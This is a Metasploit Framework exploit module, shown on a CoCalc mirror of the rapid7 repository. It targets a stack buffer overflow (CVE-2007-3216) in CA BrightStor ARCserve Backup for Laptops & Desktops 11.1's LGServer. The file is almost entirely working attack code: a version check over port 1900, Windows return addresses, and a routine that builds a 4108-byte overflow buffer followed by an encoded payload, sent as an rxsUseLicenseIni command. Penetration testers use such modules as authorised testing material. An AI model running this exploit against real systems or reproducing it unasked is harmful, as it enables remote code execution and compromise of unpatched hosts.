CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup

16
        for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an

17
        attacker could overflow the buffer and execute arbitrary code.

18
      },

19
      'Author'         => [ 'MC' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'CVE', '2007-3216' ],

24
          [ 'OSVDB', '35329' ],

25
          [ 'BID', '24348' ],

26
        ],

27
      'Privileged'     => true,

28
      'DefaultOptions' =>

29
        {

30
          'EXITFUNC' => 'process',

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'    => 700,

35
          'BadChars' => "\x00",

36
          'StackAdjustment' => -3500,

37
        },

38
      'Platform' => 'win',

39
      'Targets'  =>

40
        [

41
          [ 'Windows 2003 SP0 English',	{ 'Ret' => 0x71ae1f9b } ],

42
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x75031dce } ],

43
        ],

44
      'DisclosureDate' => '2007-06-06',

45
      'DefaultTarget' => 0))

46


47
    register_options([ Opt::RPORT(1900) ])

48
  end

49


50
  def check

51
    connect

52


53
    sock.put("0000000019rxrGetServerVersion")

54
    ver = sock.get_once

55


56
    disconnect

57


58
    if ( ver and ver =~ /11\.1\.742/ )

59
        return Exploit::CheckCode::Appears

60
    end

61


62
    return Exploit::CheckCode::Safe

63
  end

64


65
  def exploit

66
    connect

67


68
    data  = rand_text_alpha_upper(4108) + [target.ret].pack('V')

69
    data << payload.encoded + rand_text_alpha_upper(rand(300) + 1)

70


71
    sploit  = "0000004820"         # Command Length Field

72
    sploit << "rxsUseLicenseIni"   # RPC Command

73
    sploit << "~~"                 # Constant Argument Delimiter

74
    sploit << data

75


76
    print_status("Trying target #{target.name}...")

77
    # One-shot overwrite...

78
    sock.put(sploit)

79


80
    handler

81
    disconnect

82
  end

83
end

84


85